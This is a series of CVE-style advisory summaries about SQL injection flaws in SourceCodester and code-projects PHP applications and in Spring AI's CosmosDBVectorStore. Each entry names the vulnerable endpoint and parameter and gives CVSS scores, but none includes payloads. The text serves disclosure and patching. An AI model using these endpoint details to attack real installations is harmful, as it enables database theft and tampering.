SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows authenticated remote attackers to execute arbitrary SQL commands via the ID parameter in the save_expired function of /ajax.php. The vulnerability affects an administrative interface endpoint and has publicly available exploit code. CVSS 5.1 reflects low confidentiality, integrity, and availability impact despite network accessibility due to high-privilege requirement (PR:H).

SQL injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows authenticated high-privilege attackers to manipulate the ID parameter in the delete_expired function via /ajax.php?action=delete_expired, enabling remote database query manipulation with confidentiality, integrity, and availability impact. Publicly available exploit code exists and the vulnerability has been documented by VulDB.

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to execute arbitrary SQL queries via the Name parameter in the save_category function at /admin/ajax.php. The vulnerability requires valid administrative credentials but poses moderate confidentiality, integrity, and availability risk. Publicly available exploit code exists and EPSS score of 0.84 indicates high exploitation probability despite the authentication gate.

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 via the ID parameter in /view_prod.php allows authenticated remote attackers to execute arbitrary SQL queries with low complexity and no user interaction required. The vulnerability has a publicly available exploit and CVSS score of 6.3 reflecting moderate impact on confidentiality, integrity, and availability. Active exploitation is not yet confirmed in CISA KEV, but public proof-of-concept code exists.

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to execute arbitrary SQL queries via the ID parameter in the save_order function at /admin/ajax.php?action=save_order, potentially enabling data exfiltration, modification, or deletion. Publicly available exploit code exists and the vulnerability carries a CVSS score of 6.3 with low complexity, indicating moderate real-world risk despite requiring login credentials.

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to read, modify, or delete database contents through the ID parameter in the category function (pizza/index.php?page=category). The vulnerability has publicly available exploit code and requires valid user authentication to exploit, making it a moderate-risk issue suitable for immediate patching in production environments.

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows authenticated remote attackers to manipulate the ID parameter in the get_cart_items AJAX function (/admin/ajax.php?action=get_cart_items) to execute arbitrary SQL queries and extract, modify, or delete database contents. The vulnerability has a CVSS score of 6.3 with publicly available exploit code, posing moderate risk to affected installations.

SQL injection in Spring AI's CosmosDBVectorStore component (versions 1.0.0-1.0.5 and 1.1.0-1.1.4) enables authenticated remote attackers to execute arbitrary SQL queries through malicious document IDs, potentially achieving full database compromise including data exfiltration, modification, and denial of service. VMware has released patches in versions 1.0.6 and 1.1.5. CVSS score of 8.8 reflects high impact across confidentiality, integrity, and availability, though exploitation requires low-privilege authenticated access to the vector store API.

SQL injection in code-projects Coaching Management System 1.0 allows authenticated remote attackers to manipulate the complaintreply parameter in the POST handler at /cims/modules/admin/reply.php, leading to unauthorized database access and potential data exfiltration or modification. CVSS score of 6.3 reflects low confidentiality, integrity, and availability impact with network vector and low attack complexity. Public exploit code is available, and the vulnerability requires valid user authentication to trigger.

SQL injection in Pizzafy Ecommerce System 1.0 allows remote unauthenticated attackers to execute arbitrary SQL commands via the ID parameter in the get_cart_count function at /admin/ajax.php. CVSS scores 7.3 (High) with network attack vector, low complexity, and no authentication required. Public exploit code exists on GitHub, significantly lowering the barrier to exploitation. EPSS data not available, but the combination of public exploit, low attack complexity (AC:L), and no authentication (PR:N) indicates moderate-to-high real-world risk for internet-facing installations.

SQL injection in Pizzafy Ecommerce System 1.0 allows remote unauthenticated attackers to compromise database confidentiality, integrity, and availability via the email parameter in the admin login function. The vulnerability exists in /admin/ajax.php?action=login and has a publicly available proof-of-concept exploit on GitHub. With CVSS 7.3 (High) and confirmed POC, this represents an immediate risk to internet-exposed admin panels, though no active exploitation has been confirmed by CISA KEV at time of analysis.

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows remote unauthenticated attackers to compromise database confidentiality, integrity, and availability through the login2 function. The vulnerability exists in /admin/ajax.php when processing the email parameter during administrative login, enabling attackers to bypass authentication, extract sensitive data, modify records, or disrupt service. A proof-of-concept exploit has been publicly released on GitHub, significantly lowering the barrier to exploitation. CVSS 7.3 (High) reflects network-accessible attack surface with no authentication required and low attack complexity.

SQL injection in SourceCodester Pizzafy Ecommerce System 1.0 allows remote unauthenticated attackers to execute arbitrary SQL commands via the ID parameter in the delete_menu function of /admin/ajax.php. Public exploit code is available on GitHub, enabling database extraction, authentication bypass, and potential administrative access. CVSS 7.3 reflects network-accessible attack with no authentication required, though actual exploitation targets the administrative backend endpoint.